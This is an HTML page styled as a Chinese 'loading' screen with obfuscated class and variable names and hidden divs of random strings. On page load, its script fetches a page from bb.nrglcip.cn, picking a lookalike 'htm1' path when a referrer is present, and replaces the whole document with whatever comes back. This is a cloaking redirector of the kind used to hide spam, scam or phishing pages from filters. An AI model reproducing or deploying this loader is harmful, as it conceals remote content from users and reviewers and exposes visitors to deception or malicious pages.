<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MEFb3li4KW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MEFb3li4KW .nESPEWI4DuJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MEFb3li4KW .content {
            line-height: 50px;
            text-align: center
        }

        .MEFb3li4KW .img {
            width: 100%
        }

        .MEFb3li4KW .SNXnh7j {
            text-align: center
        }

        .MEFb3li4KW .SNXnh7j span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MEFb3li4KW .SNXnh7j span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MEFb3li4KW .SNXnh7j span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MEFb3li4KW .SNXnh7j span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MEFb3li4KW .SNXnh7j span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MEFb3li4KW .SNXnh7j span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MEFb3li4KW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eCY2AWQcuQdP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hHinH5 = eCY2AWQcuQdP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hHinH5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hHinH5 +".html?a=share";
		}
		
        G0tWnlw=url+"#"+new Date().getTime();
        G0tWnlw && function() {
            $.get(G0tWnlw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>QGzsraex91uihSz2Oqt0bzEI4u1TXD8Jx6JgQSA7tiP6Oibl6ZJmoTSmYYWMslCOyQimNXJMqRZH61ibr2ms</div>
<div style='display:none'>QGzsraex91uihSz2Oqt0bzEI4u1TXD8Jx6JgQSA7tiP6Oibl6ZJmoTSmYYWMslCOyQimNXJMqRZH61ibr2ms</div>
<b style='display:none' >prmXqYUqST6UQlpiCG7iZLm9ORAbleITLrF4KDAhf0ADRdgwP7dApJUTHob</b>
<img  src='' style='display:none'><div class="MEFb3li4KW">
    <div class="nESPEWI4DuJ">
        <div class="SNXnh7j">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>Kg2uuU5o5TlVe7OeP7ox3TNadzkGx4V9hBLvORtubVJZmxyCojDy</div>
<span style='display:none'>f2Ss1gWSCIzx5k3Rx855pGr9bsS4JKN</span>
<h1 style='display:none' >lx0Wo4aX9wdkFCdIG9byU9nQQlwc3QST2WmMlLNXleuPjaIZ2ysvKvB03QZPl1wGdvUPfgdAvfxyu5gaXb2S</h1>
<p  style='display:none'>bT3WRC1ankBhTp2AYrtna2GSTtolh35cntXPNfj5KZ6L7DavZANvX5Gqu8DcEfHd3FuVWcVvbKvOFQtWewoI1xr1fRhs8PJ</p>
<h1 style='display:none' >lx0Wo4aX9wdkFCdIG9byU9nQQlwc3QST2WmMlLNXleuPjaIZ2ysvKvB03QZPl1wGdvUPfgdAvfxyu5gaXb2S</h1>
<p  style='display:none'>bT3WRC1ankBhTp2AYrtna2GSTtolh35cntXPNfj5KZ6L7DavZANvX5Gqu8DcEfHd3FuVWcVvbKvOFQtWewoI1xr1fRhs8PJ</p>
<b style='display:none' >LAYW7mApB4n9LHBaSjgFMfgNoNQFICyyuiQLX</b></body>
</html>